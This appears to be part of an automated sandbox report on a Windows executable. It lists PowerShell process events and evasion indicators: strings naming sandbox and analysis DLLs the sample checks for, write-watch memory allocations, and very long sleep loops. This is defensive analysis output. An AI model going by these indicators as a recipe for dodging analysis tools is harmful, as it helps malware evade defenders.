Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: DIR_WATCH.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: SBIEDLL.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Binary or memory string: API_LOG.DLL
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr	Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 29B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Memory allocated: 2790000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Window / User API: threadDelayed 775	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Window / User API: threadDelayed 9067	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1068	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 458	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7498	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2182	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1553	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6815	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2907	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1346	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 615	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7908	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1753	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -99031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97497s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -97062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -95062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124	Thread sleep time: -94515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep count: 1068 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3364	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832	Thread sleep count: 458 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720	Thread sleep count: 7498 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 2182 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296	Thread sleep count: 1553 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5940	Thread sleep count: 265 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep count: 6815 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4820	Thread sleep count: 2907 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012	Thread sleep count: 1346 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012	Thread sleep count: 615 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 7908 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 1753 > 30	Jump to behavior
